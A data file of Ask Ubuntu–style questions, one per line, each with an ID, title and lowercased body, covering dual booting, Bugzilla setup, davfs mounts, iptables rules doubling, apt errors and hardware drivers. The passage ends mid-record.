488805	how to make a lenovo ideapad z510 as dual boot ?	i am planning to go for a lenovo ideapad z510 which comes along with windows 8.1 . now i need to install ubuntu ( linux ) on it . so how do i go about making the system dual boot ? which version of ubuntu should i use ? i am doing this for the first time , so a detailed explanation will be very much appreciated .
488811	apache not rendering bugzilla cgi	i 've just tried to install bugzilla on my machine for test purposes . i 'm going to evaluate the bugzilla rest api for a company i 'm currently interning at . the problem is that when i go to http : //localhost/bugzilla/ this is what i 'm seeing . # ! /usr/bin/perl -wt # this source code form is subject to the terms of the mozilla public # license , v. 2.0 . if a copy of the mpl was not distributed with this # file , you can obtain one at http : //mozilla.org/mpl/2.0/ . # # this source code form is `` incompatible with secondary licenses '' , as # defined by the mozilla public license , v. 2.0 . # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # script initialization # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # make it harder for us to do dangerous things in perl . use strict ; # include the bugzilla cgi and general utility library . use lib qw ( . lib ) ; use bugzilla ; use bugzilla : :constants ; use bugzilla : :error ; use bugzilla : :update ; # check whether or not the user is logged in my $ user = bugzilla- > login ( login_optional ) ; my $ cgi = bugzilla- > cgi ; my $ template = bugzilla- > template ; my $ vars = { } ; # and log out the user if requested . we do this first so that nothing # else accidentally relies on the current login . if ( $ cgi- > param ( 'logout ' ) ) { bugzilla- > logout ( ) ; $ user = bugzilla- > user ; $ vars- > { 'message ' } = `` logged_out '' ; # make sure that templates or other code does n't get confused about this . $ cgi- > delete ( 'logout ' ) ; } # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # main body execution # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # return the appropriate http response headers . print $ cgi- > header ( ) ; if ( $ user- > in_group ( 'admin ' ) ) { # if 'urlbase ' is not set , display the welcome page . unless ( bugzilla- > params- > { 'urlbase ' } ) { $ template- > process ( 'welcome-admin.html.tmpl ' ) || throwtemplateerror ( $ template- > error ( ) ) ; exit ; } # inform the administrator about new releases , if any . $ vars- > { 'release ' } = bugzilla : :update : :get_notifications ( ) ; } # generate and return the ui ( html page ) from the appropriate template . $ template- > process ( `` index.html.tmpl '' , $ vars ) || throwtemplateerror ( $ template- > error ( ) ) ; i added < directory /var/www/ > addhandler cgi-script .cgi .pl options +indexes +execcgi +followsymlinks allowoverride all < /directory > to the 000-default.conf file to allow cgi-script in all areas .
488812	automating a mount operation that requires user input	i want to mount a directory on a file server at startup . this is my /etc/fstab entry : # mount the fileserver https : //fsrv.company/ /mnt/fileserver davfs user , auto 0 0 manually mounting it with mount /mnt/fileserver works fine . however , because of an outdated certificate this issues a prompt which i always have to answer with yes : /sbin/mount.davfs : the server certificate does not match the server name /sbin/mount.davfs : the server certificate is not trusted [ ... ] accept certificate for this session ? [ y , n ] y this device should be mounted when starting ubuntu ( due to the auto option ) . however , the device is not mounted , probably because of the required input . the owner of the fileserver wont update its certificate . how can i automate this process , such that the device is mounted at startup with the answer being always y\n ? edit : i did download and place the certificate in .davfs2/certs/ and edited the entry in .davfs2/davfs2.conf ( as hinted below by @ oli ) , but the interactive input remains .
488815	execute commands with sudo as a root	i would like to execute the command gedit file.txt as a root with sudo e.g . : sudo gedit file.txt should ask me for a root password . currently , typing sudo gedit file.txt results in : [ sudo ] password for currently_logged_in_user : after typing the password , it results in : currently_logged_in_user is not in the sudoers file . this incident will be reported . so i have to use su root gedit file.txt instead which is inconvenient .
488816	installation guide for multiple servers using cockpit	i found this project can handle multiple servers cockpit project but i do not know how to use it . question is then , is there cockpit documentation or is there an alternative for multiple server installations besides landscape ?
488820	lubuntu mouse default state	system lubuntu alongside win-xp , i changed the appearance of the mouse-pointer to red by manupulating properties . this must have also had an effect on the driver-sw , as subsequently since then i always got a blue-screen when starting windows ! uninstalled mouse-driver and disconnected the mouse and restarted . all ok . but each time when i start lubuntu , i get back the red mouse and the problem with the blue-screen on windows repeats . how can i reset the mouse to its original setting ? ricky addendum : after some experimenting , solved the problem by restoring windows back in the past to a date prior to me changing the appearance of the mouse-pointer in lubuntu ! ricky
488821	changing file extention	in a folder i have a .run file and am trying to change the extension to .clu . the problem is that i have tried rename 's/.run $ /.clu/ ' *.run but this does absolutely nothing to the file . note : i 'm not trying to convert the file , just to rename the extension .
488823	google chrome not starting	i am running 14.04 with latest update 3.13.0-30-generic . after restarting post update i found that google chrome is not launching . i am able to launch google-chrome from command line but if i close the terminal window the chrome window closes too ! a new icon appeared in launcher so i locked into launcher but after closing the terminal window ( the one used to launch chrome ) , the icon does not relaunch chrome . i also found that the incorrect app name appear up in the menu `` secustore '' instead of `` google chrome ''
488828	am i using more than 4 gb on my 32-bit system ?	i have a relatively clean installation of ubuntu which reads this under system details : i 've read everywhere that 32-bit oss do n't support more than 4 gb of ram ( some sources say 3 gb ) , so what 's going on in my system ? does it recognize but not use all the ram i 'm providing it ( btw , the system monitor also shows 5,8 gib ) or what ? unless the system installed pae automatically , i 'm not using it . i 've taken a look at the answers on does ubuntu desktop 32bit support more than 4gb memory with default installation ? , but am still looking for an answer to my case .
488832	error when adding a source	i am trying to install openfoam , but the installation requires that i first run the lines : vers= $ ( lsb_release -cs ) sudo sh -c `` echo deb http : //www.openfoam.org/download/ubuntu $ vers main > /etc/apt/sources.list.d/openfoam.list '' and then run : sudo apt-get update when i run this last line i however get the following errors : w : failed to fetch http : //www.openfoam.org/download/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //www.openfoam.org/download/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i havent seen anyone else complaining about this when installing openfoam , so i do n't think it is a fault with openfoam
488834	trying to make my sixaxis ps3 controller work on my computer for minecraft	ok so i followed the steps on here and on steps 8 and 9 i got this g++ -c -pipe -o2 -wall -w -d_reentrant -ddevdir=\ '' /dev/input\ '' -dicon24=\ '' /usr/local/share/pixmaps/qjoypad/icon24.png\ '' -dicon64=\ '' /usr/local/share/pixmaps/qjoypad/icon64.png\ '' -dqt_no_debug -dqt_gui_lib -dqt_core_lib -dqt_shared -i/usr/share/qt4/mkspecs/linux-g++ -i . -i/usr/include/qt4/qtcore -i/usr/include/qt4/qtgui -i/usr/include/qt4 -i . -i . -o axis.o axis.cpp make : g++ : command not found make : *** [ axis.o ] error 127 i have no idea what to do please help ; - ;
488837	how to disable ctrl+alt+f8 ?	is there a way to disable only key combination for ctrl+alt+f8 ? i need to use this shortcut in another application and when i trigger it , i am getting switched to the blank console ( other user space ) . i am the only user on a machine and do n't need this shortcut ever . ideally , i would be able to preserve keyboard shortcuts 1 to 7 .
488838	set ubuntu 12.04 dash 's default lens to its application lens and some other tweaks !	here are the questions about persistent dash customization for my ubuntu 12.04 lts : assign the application lens as the default lens selected when the dash is called with super or other assigned key or , assign a different lens as my dash home ; show the full list of the installed applications as in the snapshot below ( i am looking for a customization where full app list would be the default ) ; the filter results should too come up pre-selected with the dash .
488841	how to formate seagate 2 tb external hard disk for mac os x	i have a seagate 2 t.b external h.d.d.how do i format it so that i can use it for cross plateform o.s ( windows ; linux ; os x . ) is it possible ?
488845	how will i install goauto dial in ubuntu 12.04	how will i install goauto dial in ubuntu 12.04 . please suggest me the right way . thanks in advance
488846	install windows after installing ubuntu and kali ?	hello have dual boot my laptop running kali linux 1.0.7 and ubuntu 14.04 . for some application i need windows , as wine does not support that apps and not have sufficient ram to run windows in virtual machine , my question : i have ubuntu 's grub loaded in my laptop , so when i delete kali linux partition and made un-allocated space , can i install windows 7 in that un-allocated space ? if yes after installing windows 7 should i need to re-install grub ( i do n't think so because i have ubuntu 's boot loader ) and install kali after installing windows 7
488849	how do i get my window frames back in gnome flashback ?	sometimes i wonder if there 's a conspiracy to kill gnome flashback because it feels like it 's been constantly beset with problems since the emergence of both gnome 3 's new look and unity . as in a previously question , after an update , i could n't log in , and and it turned out to be the fault of malformed packages . now , after another update , my windows do n't have any decoration ( no frame with the program title and the close , minimize and maximuze buttons ) . it 's also made my ibus input switching no longer respond to my shortcut keys ( which i 'll address in a separate question if it persists ) . how do i get my window decorations back ? and is gnome flashback being supported anymore ? it just seems like it 's slowly breaking .
488852	non sudoer access to a kernel module	is it possible to access a kernel module if a user is not sudoer ? i am trying to access a kvm , which is kernel module , as non-sudoer but i am getting an error : could not access kvm kernel module : permission denied . is there any way to make this module accessible to all users ( non-sudoers as well ) ?
488855	warning multiple values for a block parameter ( 2 for 1 )	i get this when i start ubuntu : odin.rb:202 : warning : multiple values for a block parameter ( 2 for 1 ) from /var/lib/gems/1.8/gems/eventmachine-0.12.10/lib/em/deferrable.rb:134 mclient.rb:202 : warning : multiple values for a block parameter ( 2 for 1 ) from /var/lib/gems/1.8/gems/eventmachine-0.12.10/lib/em/deferrable.rb:134 what should i do ?
488856	lexmark printer stop working after upgrade to ubuntu 14.04	my parents have a lexmark pinnacle 901 pro printer/scanner . since their ubuntu 12.04 was out of date i updated their laptop to ubuntu 14.04 64bit . printer stopped working after that . i did a lot research about this problem , seems that lexmark only provide linux drivers for ubuntu 12.04 and doesnt support newer versions . also tried drivers for newer lexmark printers , but they are n't working . lexmark toolkit recognize the printer , with usb and wifi , but can only store the usb connection , nit wifi . but its impossible to print anything . anyone found a solution for this ? are there any universal drivers they can use as alternative ? was so happy that they managed it to use ubuntu after a lot trouble with windows in the last year . would be a blame if they have to change back to windows .
488863	ubuntu 14.04 keeps freezing	i am not really sure on what is happening but my laptop keeps freezing on me . this has been happening for a few days now , and i notice that it happens when i am loading a youtube video or downloading something . usually i would hit ctrl + alt + t to get out of a frozen screen and it helped but now i am finding it does n't help anymore . what usually does help is when i go into tty1 . it 's manageable but annoying that my laptop keeps freezing up like that . my laptop is an asus ultrabook s56c and i bought it last year , so something like this should n't be happening . do you have any suggestions on what might be causing my laptop to freeze ?
488864	black screen on boot with ubuntu 14.04 lts and kernel 3.15	i 've installed kernel 3.15.1-031501 and today 3.15.2-031502 because with 3.13 my hp 6730s has wrong fan control . but with both 3.15.1 and 3.15.2 , after grub selection , something like 50 % of boots fail ! in these situations i ca n't access the terminal by pressing ctrl-alt-f1 so i have to reboot by long pressing power button . someone can tell me what can i do ? thank you ! hw config : cpu intel core 2 due t9400 ( 2.53 ghz , 6mb cache l2 ) ram sodimm ddr2 pc2-6400 800mhz 1x4gb hynix + 1x2gb micron bridge intel mobile 4 series hd toshiba mk5055gs ( 500gb sata ) ethernet marvell 88e8042 pci-e fast ethernet controller wireless broadcom bcm4312 ( con driver b43 necessari per il kernel 3.15 ) graphics mobile intel gm45 express chipset audio intel hd audio controller
488867	ubuntu server error : attemp to read or write outside of disk hd0	i have just installed ubuntu server14.04 , when the server boots it says error : attempt to read or write outside of disk hd0 . entering rescue mode ... grub rescue > i have reinstalled the server , but partitioning the hard drive manually as was suggested in another similar question - this did not work however it may just be that i am doing it wrong . the server is fitted with a 3tb hard drive it would be greatly appreciated if someone could help me fix this issue thanks
488871	firefox/chrome in ubuntu ca n't connect to a specific website	i have ubuntu 12.04 lts . i had no problem in the first few weeks but at some point i could not connect to www.mitbbs.com anymore . i can still telnet ( ssh ) mitbbs.com ( port 23 ) in a terminal . i tried google chrome no success . chrome 's status bar reads `` resolving host ... '' then the main window displays `` oops ! google chrome could not find www.mitbbs.com '' . nm-tool indicates three local dns servers . i have no control to the router . anything else i can try ?
488873	why does the command `` xterm xterm '' create an infinite recursion ?	i am running ubuntu 14.04 ( 64 bit ) . when i first found out about the command xterm , i tried the command xterm xterm , and it started infinitely opening new xterm windows . ctrl + c stops it immediately and closes all windows . but i wanted to see how far it goes and let it run as long as it can . it ate up almost all the ram and eventually got closed ( i think by the system itself ) . so just out of curiosity , why/how does this happen ?
488874	php startup unable to load dynamic library	i 'm getting this error in my apache error log while trying to get curl to work on php : php warning : php startup : unable to load dynamic library '/usr/lib/php5/20121212/curl.so ' - /usr/lib/php5/20121212/curl.so : symbol curl_easy_pause , version curl_openssl_3 not defined in file libcurl.so.4 with link time reference in unknown on line 0 the file it references is there in that location and i 'm trying to figure out if i 've missed any dependancies while installing curl for php . there are no errors when i use curl -v on the command line . i 've tried the following commands : sudo apt-get install php5-curl sudo apt-get update sudo apt-get install openssl i 've also tried removing php completely and installing it from scratch using the following command : sudo apt-get install php5-common libapache2-mod-php5 php5-cli then after : sudo apt-get install php5-curl what am i missing here ? my software versions : php 5.5.9-1ubuntu4.2 ( cli ) ( built : jun 25 2014 17:17:37 ) curl 7.16.0 ( x86_64-unknown-linux-gnu ) libcurl/7.16.0 ubuntu 14.04 thanks in advance
488875	a tool for monitoring changes in region of the screen	i 'd like to monitoring changes in a region of a window , this windows is showing a virtual box machine , and i need to get a log with a timestamp of that changes .
488877	virtualmin/webmin on ubuntu mysql server root user does n't work anymore	i was trying to make some configuration from webmin on my server and suddenly i do n't know what i 've done but i receive the following error : the full mysql error message was : dbi connect failed : access denied for user 'root ' @ 'localhost ' ( using password : yes ) and all services that i have installed on my server use root user for mysql , such as roundcube for webmail , phpmyadmin . i tried to reset the password of root following the steps here : http : //ubuntuforums.org/showthread.php ? t=1570027 and here https : //help.ubuntu.com/community/mysqlpasswordreset but i was n't successful . any idea of what i should do next ?
488880	update problem error	i have a problem with updates in ubuntu this is the message from update manager : http : //imgur.com/kknooxi thanks for help .
488883	intel hda ( realtek alc887 ) audio stutter	installed on a new pc with an asus h97m-plus motherboard , got everything to work except the audio . while i have sound , and the mixers and volume controls appear to work correctly , the audio is very distorted . the speaker-test command for example emits a series of loud pops , which continue for about 5 seconds after being stopped . the system alert sound repeats about 20 times , getting shorter on each repeat ( bit like a skipping cd ) , an mp3 in vlc sounds dreadful , but for hd video in vlc or playing a video in youtube , sound is for the most-part ok . i have tried everything and almost anything suggested on this issue , all the suggestions make it only very slightly better ( or worse ) . what it is not : something i installed - boot from live usb has the same issue . pulseaudio ( killing it and using vlc direct to alsa is just as bad ) . helped by changes to the intel-hda driver arguments ( tried many of them such as disable power management , disable msi , model=asus , model=generic , model=auto , none of these resulted in any change in behaviour ) . outdated/corrupted alsa/audio drivers - reinstalling results in the same behaviour . a conflict with the graphics card - it occurs even when that is removed . an irq conflict - see /proc/interrupts below cat /proc/interrupts cpu0 cpu1 cpu2 cpu3 0 : 16 0 0 0 io-apic-edge timer 1 : 32306 193 147 107 io-apic-edge i8042 5 : 0 0 0 0 io-apic-edge parport0 7 : 7 0 0 0 io-apic-edge 8 : 0 0 0 1 io-apic-edge rtc0 9 : 0 0 0 0 io-apic-fasteoi acpi 16 : 1760713 10458 490808 424669 io-apic-fasteoi ehci_hcd : usb1 , ath9k 17 : 1012 62 49 44 io-apic-fasteoi 22 : 577 0 0 0 io-apic-fasteoi 23 : 46 1 4 10 io-apic-fasteoi ehci_hcd : usb2 41 : 718982 157194 22770 10318 pci-msi-edge xhci_hcd 42 : 39688 164281 587946 296079 pci-msi-edge ahci 43 : 12 0 0 0 pci-msi-edge mei_me 44 : 419627 0 195 7504 pci-msi-edge eth0 45 : 915 0 0 0 pci-msi-edge snd_hda_intel 46 : 533177 14245 7497 7726 pci-msi-edge nvidia 47 : 0 0 0 0 pci-msi-edge snd_hda_intel nmi : 27 139 138 133 non-maskable interrupts loc : 3254256 2931833 2913952 2776206 local timer interrupts spu : 0 0 0 0 spurious interrupts pmi : 27 139 138 133 performance monitoring interrupts iwi : 137941 104702 117956 109883 irq work interrupts rtr : 5 1 0 0 apic icr read retries res : 1229699 1197933 1276401 1194185 rescheduling interrupts cal : 2473 2524 2531 2830 function call interrupts tlb : 93921 105819 135776 115012 tlb shootdowns trm : 0 0 0 0 thermal event interrupts thr : 0 0 0 0 threshold apic interrupts mce : 0 0 0 0 machine check exceptions mcp : 116 115 115 115 machine check polls err : 7 mis : 0 internal audio is irq 45 , gfx card audio is irq 47 . output of alsa-info.txt is too long for here , so it is at http : //pastebin.com/3wegasfh the odd thing is , if i make the application playing audio consume more cpu ( eg by rolling mouse over some links or scrolling up and down , the audio will 'come-good ' while that activity is occurring . is there anything that can fix this , or it just a matter of waiting for better driver support ?
488884	re-install windows 8 from image	i 've installed ubuntu 14.04 on my l laptop that came with windows 8 , but unfortunately windows 8 did n't survive , i do n't have an installation disc , but i do have a backup image of windows 8 on an external drive , how should i re-install windows 8 to dual-boot with ubuntu ?
488885	what do i need to install after minimal xubuntu installation	i had an old and low-specced pc lying around and since there 's no point selling it i decided to install linux on it just for fun : p it 's a toshiba tecra 8000 ( 192mb ram and 380mhz pentium ii ) so i had to do a minimal installation . i installed xubuntu ( and later realised i also needed xfce4 to have a desktop ) . my question is what else would i need to have a proper ( but efficient ) os . i found some info here xubuntu desktop minimal installation but i 'd like to know what file manager and browser you 'd recommend for these kind of specs . will xubuntu be usable or would lubuntu or another distro be better ? thanks in advance , keep in mind there 's no hurry as this is just a little side project . have a nice day ! : d
488886	how to make huawei 4g module me909u-521 work on ubuntu ?	i 'm having some trouble having an internet connection on 4g with ubuntu ( latest version , latest kernel ) . i had no trouble making my huawei e3276 lte dongle work . now i 'm trying to connect my computer to the internet using a huawei me909u-521 module , with a minipcie to usb adaptor . i suspect this is a driver problem . i searched the web for a driver without any success . the huawei website does provide some guidelines on what seems to be a `` how to code your own driver ... '' but there is no linux driver available as advertised . here is the dmesg info : [ 1766.351068 ] usb 5-1 : new low-speed usb device number 54 using uhci_hcd [ 1766.464078 ] usb 5-1 : device descriptor read/64 , error -71 [ 1766.678066 ] usb 5-1 : device descriptor read/64 , error -71 [ 1766.881082 ] usb 5-1 : new low-speed usb device number 55 using uhci_hcd [ 1766.994077 ] usb 5-1 : device descriptor read/64 , error -71 [ 1767.208033 ] usb 5-1 : device descriptor read/64 , error -71 [ 1767.411044 ] usb 5-1 : new low-speed usb device number 56 using uhci_hcd [ 1767.819191 ] usb 5-1 : device not accepting address 56 , error -71 [ 1767.921066 ] usb 5-1 : new low-speed usb device number 57 using uhci_hcd [ 1768.329088 ] usb 5-1 : device not accepting address 57 , error -71 [ 1768.329129 ] hub 5-0:1.0 : unable to enumerate usb device on port 1 [ 1768.535093 ] usb 5-1 : new low-speed usb device number 58 using uhci_hcd [ 1768.648053 ] usb 5-1 : device descriptor read/64 , error -71 [ 1768.862037 ] usb 5-1 : device descriptor read/64 , error -71 [ 1769.065125 ] usb 5-1 : new low-speed usb device number 59 using uhci_hcd [ 1769.178099 ] usb 5-1 : device descriptor read/64 , error -71 [ 1769.392092 ] usb 5-1 : device descriptor read/64 , error -71 [ 1769.595100 ] usb 5-1 : new low-speed usb device number 60 using uhci_hcd [ 1770.003041 ] usb 5-1 : device not accepting address 60 , error -71 [ 1770.105070 ] usb 5-1 : new low-speed usb device number 61 using uhci_hcd [ 1770.513045 ] usb 5-1 : device not accepting address 61 , error -71 [ 1770.513073 ] hub 5-0:1.0 : unable to enumerate usb device on port 1 [ 1773.828100 ] hub 5-0:1.0 : unable to enumerate usb device on port 1 [ 2734.160199 ] usb 5-1 : new low-speed usb device number 63 using uhci_hcd [ 2734.274127 ] usb 5-1 : device descriptor read/64 , error -71 [ 2734.540109 ] usb 5-1 : device descriptor read/64 , error -71 [ 2734.743050 ] usb 5-1 : new low-speed usb device number 64 using uhci_hcd [ 2734.856053 ] usb 5-1 : device descriptor read/64 , error -71 [ 2735.071082 ] usb 5-1 : device descriptor read/64 , error -71 [ 2735.274102 ] usb 5-1 : new low-speed usb device number 65 using uhci_hcd [ 2735.683081 ] usb 5-1 : device not accepting address 65 , error -71 [ 2735.785059 ] usb 5-1 : new low-speed usb device number 66 using uhci_hcd [ 2736.194079 ] usb 5-1 : device not accepting address 66 , error -71 [ 2736.194115 ] hub 5-0:1.0 : unable to enumerate usb device on port 1 lsusb does n't return any entry matching with the device . any advice on what to do to make this thing work ? thanks for your help !
488890	how do i setup wireless on hp compaq 6720s ?	can`t turn on the wifi network . i visited the recommended website and install the recommended driver , but all this not help .
488891	working with official canon print drivers ( canon mf4870dn )	so after following the tedious process of manually installing the .deb drivers provided by canon for linux , my network printer does n't give anything except a beep when first trying to print . the drivers and help manual were downloaded from here : http : //software.canon-europe.com/products/0011155.asp any ideas on how to acquire the debug log or see what 's going on ? ubuntu 14.04 .
488893	automate multiple file conversions	i need help fixing my script to automate multiple file conversions . i am working on the server and i am trying to find a way to convert files automatically . the conversion needs to be made through four formats : sam , bwa , and bcf , and vcf the files increment at two spots like this . each increment has two file formats : .sai and .fastq 004_001 004_002 004_003 004_004 then 005_001 005_002 005_003 005_004 i have tried : code : for i in { 1..4 } do $ bwa samse $ hg19 $ csai $ cfas > *.sam done but it only worked with the _001 file all four times . i have tried setting the end increment to i so instead of _001 it 's _00 $ ( ( i ) ) to go 1,2,3,4 but its stays at 1 . example of sam conversion : for i in { 1..4 } do ./bwa samse /hg19.fa *_00 $ ( ( i ) ) .sai *_00 $ ( ( i ) ) .fastq > *_00 $ ( ( i ) ) .sam done i wrote it to run input files with that name and output data to the sam file . it works but it converts _001 four time instead of _001 to _004 basically i need to write a script that will automate multiple file conversions 3 file inputs > output 1 file .sam input .sam file > output .bam file input .bam file > output .bcf file input .bcf file > output .vcf file
488894	why is iptables getting double rules ?	i have a server running ubuntu 12.04 . a couple of reboots back i started noticing that iptables rules get doubled upon reboot . this is what i get after a reboot ( with added line breaks ) : $ sudo iptables -s -p input accept -p forward accept -p output accept -n fail2ban-apache-overflows -n fail2ban-ssh -a input -p tcp -m multiport -- dports 80,443 -j fail2ban-apache-overflows -a input -p tcp -m multiport -- dports 22 -j fail2ban-ssh -a input -d 127.0.0.1/32 -p tcp -m tcp -- dport 3306 -m state -- state new , established -j accept -a input -s 1.2.3.4/32 -p tcp -m tcp -- dport 3306 -m state -- state new , established -j accept -a input -p tcp -m tcp -- dport 3306 -j reject -- reject-with icmp-port-unreachable -a input -p udp -m udp -- dport 53 -m hashlimit -- hashlimit-above 20/sec -- hashlimit-burst 100 -- hashlimit-mode srcip -- hashlimit-name dns -- hashlimit-htable-expire 1 -- hashlimit-srcmask 28 -j drop -a input -d 127.0.0.1/32 -p tcp -m tcp -- dport 3306 -m state -- state new , established -j accept -a input -s 1.2.3.4/32 -p tcp -m tcp -- dport 3306 -m state -- state new , established -j accept -a input -p tcp -m tcp -- dport 3306 -j reject -- reject-with icmp-port-unreachable -a input -p udp -m udp -- dport 53 -m hashlimit -- hashlimit-above 20/sec -- hashlimit-burst 100 -- hashlimit-mode srcip -- hashlimit-name dns -- hashlimit-htable-expire 1 -- hashlimit-srcmask 28 -j drop -a fail2ban-apache-overflows -j return -a fail2ban-ssh -j return the four rules that get applied twice should get loaded from if-pre-up.d : $ cat /etc/network/if-pre-up.d/iptablesload # ! /bin/bash # flush iptables /sbin/iptables -f # mysql locally /sbin/iptables -a input -d 127.0.0.1/32 -p tcp -m tcp -- dport 3306 -m state -- state new , established -j accept # mysql access allowed from work /sbin/iptables -a input -s 1.2.3.4/32 -p tcp -m tcp -- dport 3306 -m state -- state new , established -j accept /sbin/iptables -a input -p tcp -m tcp -- dport 3306 -j reject -- reject-with icmp-port-unreachable # rate limit on dns requests /sbin/iptables -a input -p udp -m udp -- dport 53 -m hashlimit -- hashlimit-above 20/sec -- hashlimit-burst 100 -- hashlimit-mode srcip -- hashlimit-name dns -- hashlimit-htable-expire 1 -- hashlimit-srcmask 28 -j drop exit 0 i have tried adding this clean-up script to make sure everything get nuked when the server goes down : $ cat /etc/network/if-post-down.d/iptablesunload # ! /bin/sh echo `` stopping firewall and allowing everyone ... '' /sbin/iptables -f /sbin/iptables -x /sbin/iptables -t nat -f /sbin/iptables -t nat -x /sbin/iptables -t mangle -f /sbin/iptables -t mangle -x /sbin/iptables -p input accept /sbin/iptables -p forward accept /sbin/iptables -p output accept but it makes no difference . re-applying everything cleans up the mess : $ sudo /etc/network/if-post-down.d/iptablesunload ; sudo /etc/network/if-pre-up.d/iptablesload ; sudo service fail2ban restart ; sudo iptables -s stopping firewall and allowing everyone ... * restarting authentication failure monitor fail2ban [ ok ] -p input accept -p forward accept -p output accept -n fail2ban-apache-overflows -n fail2ban-ssh -a input -p tcp -m multiport -- dports 80,443 -j fail2ban-apache-overflows -a input -p tcp -m multiport -- dports 22 -j fail2ban-ssh -a input -d 127.0.0.1/32 -p tcp -m tcp -- dport 3306 -m state -- state new , established -j accept -a input -s 1.2.3.4/32 -p tcp -m tcp -- dport 3306 -m state -- state new , established -j accept -a input -p tcp -m tcp -- dport 3306 -j reject -- reject-with icmp-port-unreachable -a input -p udp -m udp -- dport 53 -m hashlimit -- hashlimit-above 20/sec -- hashlimit-burst 100 -- hashlimit-mode srcip -- hashlimit-name dns -- hashlimit-htable-expire 1 -- hashlimit-srcmask 28 -j drop -a fail2ban-apache-overflows -j return -a fail2ban-ssh -j return i 've added an echo to iptablesload to track when the script runs : echo `` $ ppid : `ps -ocommand= -p $ ppid` '' > /tmp/loading_iptables.`date + % f_ % h : % m : % s. % n` after a reboot i can now verify that the script runs multiple times : $ ls /tmp/ loading_iptables.2014-06-30_09:58:06.732185289 loading_iptables.2014-06-30_09:58:06.766291579 $ cat /tmp/* 729 : run-parts /etc/network/if-pre-up.d 782 : run-parts /etc/network/if-pre-up.d this then brings up two questions : why does the script run twice ? why does n't the iptables -f clean up rules between executions ?
488898	will ubuntu 14.04 provide driver for rosewill rc-211 silicon image 2 port sata ii pci express host controller card	does anyone know if ubuntu 14.04 provides drivers for this card ( newegg ) ? will it work plug and play style ? background ... reusing a pc from 2006 . the mobo sata ports are bad so i am buying a sata controller to bypass this issue . i currently have no drive running ubuntu on this system . so the pc would be booting from ubuntu boot dvd on a new sata controller and a freshly formatted hdd . intel d975xbx ver.3 -- -- -pny 8800gts 512mb -- -- -intel e6600 -- -- -seagate 320gb barracuda 7200rpm -- -- -2x corsair xms2 ddr2 512mb/each , 2x a-data vitesta ddr2 512mb/each
488900	workaround to hash sum mismatch in apt-get update behind firewall	i am using ubuntu 12.04 , 64 bit virtual machine within a company network which obviously has firewalls . when i try to run sudo apt-get update or sudo apt-get update -- fix-missing i get this error : ( assume archive.ubuntu.com before ever _ubuntu ) w : failed to fetch bzip2 : /var/lib/apt/lists/partial/_ubuntu_dists_precise_main_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/_ubuntu_dists_precise_multiverse_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/_ubuntu_dists_precise_universe_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial /_ubuntu_dists_precise_main_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/_ubuntu_dists_precise_restricted_binary-i386_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/_ubuntu_dists_precise_multiverse_binary-i386_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/_ubuntu_dists_precise_universe_binary-i386_packages hash sum mismatch w : failed to fetch /ubuntu/dists/precise/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/_ubuntu_dists_precise_main_i18n_index w : failed to fetch /ubuntu/dists/precise/multiverse/i18n/index no hash entry in release file /var/lib/apt/lists/partial/_ubuntu_dists_precise_multiverse_i18n_index w : failed to fetch /ubuntu/dists/precise/restricted/i18n/index no hash entry in release file /var/lib/apt/lists/partial/_ubuntu_dists_precise_restricted_i18n_index w : failed to fetch /ubuntu/dists/precise/universe/i18n/index no hash entry in release file /var/lib/apt/lists/partial/_ubuntu_dists_precise_universe_i18n_index w : failed to fetch bzip2 : /var/lib/apt/lists/partial /_ubuntu_dists_precise-updates_restricted_source_sources hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . i have tried removing /var/lib/apt/lists as mentioned in other posts and it does not work . the actual problem is that the company firewall is corrupting the download traffic which gives the hash sum mismatch . this is a known issue as seen here as well : http : //unix.stackexchange.com/questions/116641/how-do-you-fix-apt-get-update-hash-sum-mismatch so , is there any work around to update packages for me and many ubuntu users behind company firewalls ?
488905	installation boot options not working	i have downloaded ubuntu 14.04 , copies it to dvd disk and attempted to install . i can get as far as the install option gui : boot menu screenshot : this is where the problem arises . when i select 'try ubuntu ' , 'install ubuntu ' or 'check disk for defect ' i just get a flashing cursor and after about 10 seconds pc starts to boot to windows . i have an old ubuntu 9.0* disk and this works ok . thank you very much if you can help . system : system information time of this report : 6/27/2014 , 16:33:36 machine name : home-9d67c3b1a7 operating system : windows xp home edition ( 5.1 , build 2600 ) service pack 3 ( 2600.xpsp_sp3_qfe.130704-0421 ) language : english ( regional setting : english ) system manufacturer : dell inc. system model : dell dm051 bios : phoenix rom bios plus version 1.10 a05 processor : intel ( r ) pentium ( r ) d cpu 2.66ghz ( 2 cpus ) memory : 3062mb ram page file : 963mb used , 3984mb available windows dir : c : \windows directx version : directx 9.0c ( 4.09.0000.0904 ) dx setup parameters : not found dxdiag version : 5.03.2600.5512 32bit unicode dxdiag notes directx files tab : no problems found . display tab 1 : no problems found . sound tab 1 : no problems found . music tab : no problems found . input tab : no problems found . network tab : no problems found . directx debug levels direct3d : 0/4 ( n/a ) directdraw : 0/4 ( retail ) directinput : 0/5 ( n/a ) directmusic : 0/5 ( n/a ) directplay : 0/9 ( retail ) directsound : 0/5 ( retail ) directshow : 0/6 ( retail ) display devices card name : nvidia geforce4 mx 4000 ( microsoft corporation ) manufacturer : nvidia chip type : geforce4 mx 4000 dac type : integrated ramdac device key : enum\pci\ven_10de & dev_0185 & subsys_00000000 & 